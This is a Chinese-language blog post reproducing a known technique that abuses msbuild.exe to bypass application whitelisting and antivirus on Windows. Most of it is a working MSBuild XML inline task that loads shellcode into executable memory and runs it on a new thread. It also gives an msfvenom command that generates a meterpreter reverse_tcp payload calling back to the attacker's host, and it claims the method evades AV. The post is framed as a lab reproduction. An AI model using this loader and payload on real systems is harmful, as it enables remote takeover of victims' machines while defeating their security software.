0x00 MSBuild简介：

MSBuild是 Microsoft Build Engine 的缩写，代表 Microsoft 和 Visual Studio 的新的生成平台。MSBuild 在如何处理和生成软件方面是完全透明的，使开发人员能够在未安装Visual Studio 的生成实验室环境中组织和生成产品。MSBuild 引入了一种新的基于 XML 的项目文件格式，这种格式容易理解、易于扩展并且完全受 Microsoft 支持。MSBuild 项目文件的格式使开发人员能够充分描述哪些项需要生成，以及如何利用不同的平台和配置生成这些项

0x01 环境

攻击机kali 192.168.5.99
靶机win7 192.168.5.112
靶机装有数字AV

0x02复现

攻击机配置监听
在这里插入图片描述
靶机运行

shell弹回

0x03 jiu.xml

<Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
         <!-- This inline task executes shellcode. -->
         <!-- C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe SimpleTasks.csproj -->
         <!-- Save This File And Execute The Above Command -->
         <!-- Author: Casey Smith, Twitter: @subTee -->
         <!-- License: BSD 3-Clause -->
    <Target Name="Hello">
      <ClassExample />
    </Target>
    <UsingTask
      TaskName="ClassExample"
      TaskFactory="CodeTaskFactory"
      AssemblyFile="C:\Windows\Microsoft.Net\Framework\v4.0.30319\Microsoft.Build.Tasks.v4.0.dll" >
      <Task>
      
        <Code Type="Class" Language="cs">
        <![CDATA[
    using System;
    using System.Runtime.InteropServices;
    using Microsoft.Build.Framework;
    using Microsoft.Build.Utilities;
    public class ClassExample :  Task, ITask
    {         
      private static UInt32 MEM_COMMIT = 0x1000;          
      private static UInt32 PAGE_EXECUTE_READWRITE = 0x40;          
      [DllImport("kernel32")]
        private static extern UInt32 VirtualAlloc(UInt32 lpStartAddr,
        UInt32 size, UInt32 flAllocationType, UInt32 flProtect);          
      [DllImport("kernel32")]
        private static extern IntPtr CreateThread(            
        UInt32 lpThreadAttributes,
        UInt32 dwStackSize,
        UInt32 lpStartAddress,
        IntPtr param,
        UInt32 dwCreationFlags,
        ref UInt32 lpThreadId           
        );
      [DllImport("kernel32")]
        private static extern UInt32 WaitForSingleObject(           
        IntPtr hHandle,
        UInt32 dwMilliseconds
        );          
      public override bool Execute()
      {
        byte[] shellcode = new byte[] { 
你的payload
		};
          
          UInt32 funcAddr = VirtualAlloc(0, (UInt32)shellcode.Length,
      MEM_COMMIT, PAGE_EXECUTE_READWRITE);
          Marshal.Copy(shellcode, 0, (IntPtr)(funcAddr), shellcode.Length);
          IntPtr hThread = IntPtr.Zero;
          UInt32 threadId = 0;
          IntPtr pinfo = IntPtr.Zero;
          hThread = CreateThread(0, 0, funcAddr, pinfo, 0, ref threadId);
          WaitForSingleObject(hThread, 0xFFFFFFFF);
          return true;
      } 
    }     
        ]]>
        </Code>
      </Task>
    </UsingTask>
  </Project>

其中payload为C# shellcode

msfvenom -a x86 –platform windows -p windows/meterpreter/reverse_tcp LHOST=192.168.5.99 LPORT=10129 -f csharp

0x04总结

用亮神的payload笔者报错，无法解决，故采用其他人的payload，主要是msbuild.exe执行，能过av，但目标须装有.net4.0

0x05借鉴

https://github.com/Micropoor/Micro8/blob/master/第七十一课：基于白名单Msbuild.exe执行payload第一季.pdf
http://www.secist.com/archives/6082.html
https://blog.conscioushacker.io/index.php/2017/11/17/application-whitelisting-bypass-msbuild-exe/

对亮神基于白名单 Msbuild.exe 执行 payload 第一季复现